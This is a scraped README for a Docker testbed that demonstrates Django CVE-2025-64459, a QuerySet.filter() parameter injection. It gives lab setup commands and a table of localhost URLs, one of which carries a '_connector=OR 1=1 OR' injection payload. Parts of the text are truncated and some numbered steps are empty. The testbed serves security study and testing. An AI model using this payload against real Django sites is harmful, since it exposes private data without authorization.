Share
## https://sploitus.com/exploit?id=B6A261DE-73D4-5EE2-84F2-4CEBA2D1BC55
# Django-CVE-2025-64459-Testbed

A self-contained testbed for Django CVE-2025-64459. Demonstrates QuerySet.filter() parameter injection via dictionary expansion using Docker.

## About the Vulnerability

**CVE-2025-64459** is a high-severity vulnerability in Django (specifically versions 

## Test with Vulnerable Target

If you have the [Vulnerable Target](https://github.com/HappyHackingSpace/vulnerable-target) CLI installed or want to run it from source:

1.  Clone the Vulnerable Target repository:
    ```bash
    git clone https://github.com/HappyHackingSpace/vulnerable-target
    cd vulnerable-target
    ```

2.  Run the lab using the ID:
    ```bash
    go run cmd/vt/main.go start --id vt-2025-64459
    ```

3. b00m!

   

5. with Nuclei

   


## ๐Ÿ› ๏ธ Usage & Exploitation


| Description | Link |
| :--- | :--- |
| **Show All (Empty Search)** | [/?](http://localhost:8001/search/?) |
| **Normal Search** | [/?title__icontains=Public](http://localhost:8001/search/?title__icontains=Public) |
| **Exploit Attempt (Private)** | [/?status=private&title__icontains=Area](http://localhost:8001/search/?status=private&title__icontains=Area) |
| **_connector Exploit (CVE-2025-64459)** | [/?_connector=OR 1=1 OR&title__icontains=Public](http://localhost:8001/search/?_connector=OR%201=1%20OR&title__icontains=Public) |
## โš ๏ธ Disclaimer

This repository is for **educational and research purposes only**. Do not use this on systems you do not own or have explicit permission to test. The author is not responsible for any misuse of this information.